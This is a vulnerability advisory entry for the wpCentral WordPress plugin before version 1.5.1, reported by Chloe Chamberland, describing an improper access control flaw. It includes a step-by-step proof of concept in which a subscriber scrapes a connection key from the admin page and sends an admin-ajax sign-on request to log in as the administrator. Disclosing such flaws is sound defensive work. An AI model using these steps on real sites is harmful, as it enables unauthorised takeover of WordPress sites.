wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation

2020-02-17T00:00:00
ID WPEX-ID:3789DEF3-BA22-45D9-9951-BA51684257BA
Type wpexploit
Reporter Chloe Chamberland
Modified 2020-09-22T08:26:10

Description

The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed.

                                        
                                            1. Log in as Subscriber.
2. Scrape the page (/wp-admin/index.php) for the connection key. (i.e. view source and search for "Connection Key") Copy the key.

Excerpt:
<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk</div>
	</div><script type="text/javascript">

Extracted key:
lsgp0jlf3hjnaudtozswglpdva4xodnd94hcu5qb81dzdpt4y3iagwerwbwukmcw78g2dihphluqxagvo7dmm0igxamp2cw58jan0jvjhmv7dh953ububhnuimkgnmlk
Log out.
3. Send the following request with the connection key pasted where it says "Auth_key_here" /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=[AUTH_KEY_HERE]
4. Should now be logged in as user 1 -- presumably administrative user.